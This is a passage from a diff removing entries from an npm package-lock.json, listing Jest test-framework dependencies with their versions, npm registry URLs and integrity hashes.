"sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true - }, - "caniuse-lite": { - "version": "1.0.30001450", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001450.tgz", - "integrity": "sha512-qMBmvmQmFXaSxexkjjfMvD5rnDL0+m+dUMZKoDYsGG8iZN29RuYh9eRoMvKsT6uMAWlyUUGDEQGJJYjzCIO9ew==", - "dev": true - }, - "chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "requires": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - } - }, - "char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true - }, - "ci-info": { - "version": "3.7.1", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.7.1.tgz", - "integrity": "sha512-4jYS4MOAaCIStSRwiuxc4B8MYhIe676yO1sYGzARnjXkWpmzZMMYxY6zu8WYWDhSuth5zhrQ1rhNSibyyvv4/w==", - "dev": true - }, - "cjs-module-lexer": { - "version": "1.2.2", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.2.2.tgz", - "integrity": "sha512-cOU9usZw8/dXIXKtwa8pM0OTJQuJkxMN6w30csNRUerHfeQ5R6U3kkU/FtJeIf3M202OHfY2U8ccInBG7/xogA==", - "dev": true - }, - "cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "requires": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - } - }, - "co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true - }, - "collect-v8-coverage": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.1.tgz", - "integrity": "sha512-iBPtljfCNcTKNAto0KEtDfZ3qzjJvqE3aTGZsbhjSBlorqpXJlaWWtPO35D+ZImoC3KWejX64o+yPGxhWSTzfg==", - "dev": true - }, - "color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "dev": true, - "requires": { - "color-name": "~1.1.4" - } - }, - "color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", - "dev": true - }, - "concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", - "dev": true - }, - "convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "cross-spawn": { - "version": "7.0.3", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.3.tgz", - "integrity": "sha512-iRDPJKUPVEND7dHPO8rkbOnPpyDygcDFtWjpeWNCgy8WP2rXcxXL8TskReQl6OrB2G7+UJrags1q15Fudc7G6w==", - "dev": true, - "requires": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - } - }, - "debug": { - "version": "4.3.4", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", - "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", - "dev": true, - "requires": { - "ms": "2.1.2" - } - }, - "dedent": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-0.7.0.tgz", - "integrity": "sha512-Q6fKUPqnAHAyhiUgFU7BUzLiv0kd8saH9al7tnu5Q/okj6dnupxyTgFIBjVzJATdfIAm9NAsvXNzjaKa+bxVyA==", - "dev": true - }, - "deepmerge": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.0.tgz", - "integrity": "sha512-z2wJZXrmeHdvYJp/Ux55wIjqo81G5Bp4c+oELTW+7ar6SogWHajt5a9gO3s3IDaGSAXjDk0vlQKN3rms8ab3og==", - "dev": true - }, - "detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true - }, - "diff-sequences": { - "version": "29.3.1", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.3.1.tgz", - "integrity": "sha512-hlM3QR272NXCi4pq+N4Kok4kOp6EsgOM3ZSpJI7Da3UAs+Ttsi8MRmB6trM/lhyzUxGfOgnpkHtgqm5Q/CTcfQ==", - "dev": true - }, - "electron-to-chromium": { - "version": "1.4.284", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.4.284.tgz", - "integrity": "sha512-M8WEXFuKXMYMVr45fo8mq0wUrrJHheiKZf6BArTKk9ZBYCKJEOU5H8cdWgDT+qCVZf7Na4lVUaZsA+h6uA9+PA==", - "dev": true - }, - "emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true - }, - "emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", - "dev": true - }, - "error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "requires": { - "is-arrayish": "^0.2.1" - } - }, - "escalade": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.1.tgz", - "integrity": "sha512-k0er2gUkLf8O0zKJiAhmkTnJlTvINGv7ygDNPbeIsX/TJjGJZHuh9B2UxbsaEkmlEo9MfhrSzmhIlhRlI2GXnw==", - "dev": true - }, - "escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true - }, - "esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true - }, - "execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "requires": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - } - }, - "exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true - }, - "expect": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.4.1.tgz", - "integrity": "sha512-OKrGESHOaMxK3b6zxIq9SOW8kEXztKff/Dvg88j4xIJxur1hspEbedVkR3GpHe5LO+WB2Qw7OWN0RMTdp6as5A==", - "dev": true, - "requires": { - "@jest/expect-utils": "^29.4.1", - "jest-get-type": "^29.2.0", - "jest-matcher-utils": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-util": "^29.4.1" - } - }, - "fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==", - "dev": true - }, - "fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "requires": { - "bser": "2.1.1" - } - }, - "fill-range": { - "version": "7.0.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.0.1.tgz", - "integrity": "sha512-qOo9F+dMUmC2Lcb4BbVvnKJxTPjCm+RRpe4gDuGrzkL7mEVl/djYSu2OdQ2Pa302N4oqkSg9ir6jaLWJ2USVpQ==", - "dev": true, - "requires": { - "to-regex-range": "^5.0.1" - } - }, - "find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "requires": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - } - }, - "fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", - "dev": true - }, - "fsevents": { - "version": "2.3.2", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.2.tgz", - "integrity": "sha512-xiqMQR4xAeHTuB9uWm+fFRcIOgKBMiOBP+eXiyT7jsgVCq1bkVygt00oASowB7EdtpOHaaPgKt812P9ab+DDKA==", - "dev": true, - "optional": true - }, - "function-bind": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.1.tgz", - "integrity": "sha512-yIovAzMX49sF8Yl58fSCWJ5svSLuaibPxXQJFLmBObTuCr0Mf1KiPopGM9NiFjiYBCbfaa2Fh6breQ6ANVTI0A==", - "dev": true - }, - "gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true - }, - "get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true - }, - "get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true - }, - "get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true - }, - "glob": { - "version": "7.2.3", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", - "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", - "dev": true, - "requires": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.1.1", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - } - }, - "globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true - }, - "graceful-fs": { - "version": "4.2.10", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.10.tgz", - "integrity": "sha512-9ByhssR2fPVsNZj478qUUbKfmL0+t5BDVyjShtyZZLiK7ZDAArFFfopyOTj0M05wE2tJPisA4iTnnXl2YoPvOA==", - "dev": true - }, - "has": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/has/-/has-1.0.3.tgz", - "integrity": "sha512-f2dvO0VU6Oej7RkWJGrehjbzMAjFp5/VKPp5tTpWIV4JHHZK1/BxbFRtf/siA2SWTe09caDmVtYYzWEIbBS4zw==", - "dev": true, - "requires": { - "function-bind": "^1.1.1" - } - }, - "has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true - }, - "html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true - }, - "import-local": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.1.0.tgz", - "integrity": "sha512-ASB07uLtnDs1o6EHjKpX34BKYDSqnFerfTOJL2HvMqF70LnxpjkzDB8J44oT9pu4AMPkQwf8jl6szgvNd2tRIg==", - "dev": true, - "requires": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - } - }, - "imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", - "dev": true - }, - "inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", - "dev": true, - "requires": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "is-core-module": { - "version": "2.11.0", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.11.0.tgz", - "integrity": "sha512-RRjxlvLDkD1YJwDbroBHMb+cukurkDWNyHx7D3oNB5x9rb5ogcksMC5wHCadcXoo67gVr/+3GFySh3134zi6rw==", - "dev": true, - "requires": { - "has": "^1.0.3" - } - }, - "is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "dev": true - }, - "is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true - }, - "is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true - }, - "is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true - }, - "isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", - "dev": true - }, - "istanbul-lib-coverage": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", - "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", - "dev": true - }, - "istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "requires": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - } - }, - "istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-wcdi+uAKzfiGT2abPpKZ0hSU1rGQjUQnLvtY5MpQ7QCTahD3VODhcu4wcfY1YtkGaDD5yuydOLINXsfbus9ROw==", - "dev": true, - "requires": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^3.0.0", - "supports-color": "^7.1.0" - } - }, - "istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "requires": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - } - }, - "istanbul-reports": { - "version": "3.1.5", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.5.tgz", - "integrity": "sha512-nUsEMa9pBt/NOHqbcbeJEgqIlY/K7rVWUX6Lql2orY5e9roQOthbR3vtY4zzf2orPELg80fnxxk9zUyPlgwD1w==", - "dev": true, - "requires": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - } - }, - "jest": { - "version": "29.3.1", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.3.1.tgz", - "integrity": "sha512-6iWfL5DTT0Np6UYs/y5Niu7WIfNv/wRTtN5RSXt2DIEft3dx3zPuw/3WJQBCJfmEzvDiEKwoqMbGD9n49+qLSA==", - "dev": true, - "requires": { - "@jest/core": "^29.3.1", - "@jest/types": "^29.3.1", - "import-local": "^3.0.2", - "jest-cli": "^29.3.1" - } - }, - "jest-changed-files": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.4.0.tgz", - "integrity": "sha512-rnI1oPxgFghoz32Y8eZsGJMjW54UlqT17ycQeCEktcxxwqqKdlj9afl8LNeO0Pbu+h2JQHThQP0BzS67eTRx4w==", - "dev": true, - "requires": { - "execa": "^5.0.0", - "p-limit": "^3.1.0" - } - }, - "jest-circus": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.4.1.tgz", - "integrity": "sha512-v02NuL5crMNY4CGPHBEflLzl4v91NFb85a+dH9a1pUNx6Xjggrd8l9pPy4LZ1VYNRXlb+f65+7O/MSIbLir6pA==", - "dev": true, - "requires": { - "@jest/environment": "^29.4.1", - "@jest/expect": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^0.7.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.4.1", - "jest-matcher-utils": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-runtime": "^29.4.1", - "jest-snapshot": "^29.4.1", - "jest-util": "^29.4.1", - "p-limit": "^3.1.0", - "pretty-format": "^29.4.1", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-cli": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.4.1.tgz", - "integrity": "sha512-jz7GDIhtxQ37M+9dlbv5K+/FVcIo1O/b1sX3cJgzlQUf/3VG25nvuWzlDC4F1FLLzUThJeWLu8I7JF9eWpuURQ==", - "dev": true, - "requires": { - "@jest/core": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/types": "^29.4.1", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "import-local": "^3.0.2", - "jest-config": "^29.4.1", - "jest-util": "^29.4.1", - "jest-validate": "^29.4.1", - "prompts": "^2.0.1", - "yargs": "^17.3.1" - } - }, - "jest-config": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.4.1.tgz", - "integrity": "sha512-g7p3q4NuXiM4hrS4XFATTkd+2z0Ml2RhFmFPM8c3WyKwVDNszbl4E7cV7WIx1YZeqqCtqbtTtZhGZWJlJqngzg==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.4.1", - "@jest/types": "^29.4.1", - "babel-jest": "^29.4.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.4.1", - "jest-environment-node": "^29.4.1", - "jest-get-type": "^29.2.0", - "jest-regex-util": "^29.2.0", - "jest-resolve": "^29.4.1", - "jest-runner": "^29.4.1", - "jest-util": "^29.4.1", - "jest-validate": "^29.4.1", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.4.1", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - } - }, - "jest-diff": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.4.1.tgz", - "integrity": "sha512-uazdl2g331iY56CEyfbNA0Ut7Mn2ulAG5vUaEHXycf1L6IPyuImIxSz4F0VYBKi7LYIuxOwTZzK3wh5jHzASMw==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "diff-sequences": "^29.3.1", - "jest-get-type": "^29.2.0", - "pretty-format": "^29.4.1" - } - }, - "jest-docblock": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.2.0.tgz", - "integrity": "sha512-bkxUsxTgWQGbXV5IENmfiIuqZhJcyvF7tU4zJ/7ioTutdz4ToB5Yx6JOFBpgI+TphRY4lhOyCWGNH/QFQh5T6A==", - "dev": true, - "requires": { - "detect-newline": "^3.0.0" - } - }, - "jest-each": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.4.1.tgz", - "integrity": "sha512-QlYFiX3llJMWUV0BtWht/esGEz9w+0i7BHwODKCze7YzZzizgExB9MOfiivF/vVT0GSQ8wXLhvHXh3x2fVD4QQ==", - "dev": true, - "requires": { - "@jest/types": "^29.4.1", - "chalk": "^4.0.0", - "jest-get-type": "^29.2.0", - "jest-util": "^29.4.1", - "pretty-format": "^29.4.1" - } - }, - "jest-environment-node": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.4.1.tgz", - "integrity": "sha512-x/H2kdVgxSkxWAIlIh9MfMuBa0hZySmfsC5lCsWmWr6tZySP44ediRKDUiNggX/eHLH7Cd5ZN10Rw+XF5tXsqg==", - "dev": true, - "requires": { - "@jest/environment": "^29.4.1", - "@jest/fake-timers": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "jest-mock": "^29.4.1", - "jest-util": "^29.4.1" - } - }, - "jest-get-type": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.2.0.tgz", - "integrity": "sha512-uXNJlg8hKFEnDgFsrCjznB+sTxdkuqiCL6zMgA75qEbAJjJYTs9XPrvDctrEig2GDow22T/LvHgO57iJhXB/UA==", - "dev": true - }, - "jest-haste-map": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.4.1.tgz", - "integrity": "sha512-imTjcgfVVTvg02khXL11NNLTx9ZaofbAWhilrMg/G8dIkp+HYCswhxf0xxJwBkfhWb3e8dwbjuWburvxmcr58w==", - "dev": true, - "requires": { - "@jest/types": "^29.4.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } - }, - "jest-leak-detector": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.4.1.tgz", - "integrity": "sha512-akpZv7TPyGMnH2RimOCgy+hPmWZf55EyFUvymQ4LMsQP8xSPlZumCPtXGoDhFNhUE2039RApZkTQDKU79p/FiQ==", - "dev": true, - "requires": { - "jest-get-type": "^29.2.0", - "pretty-format": 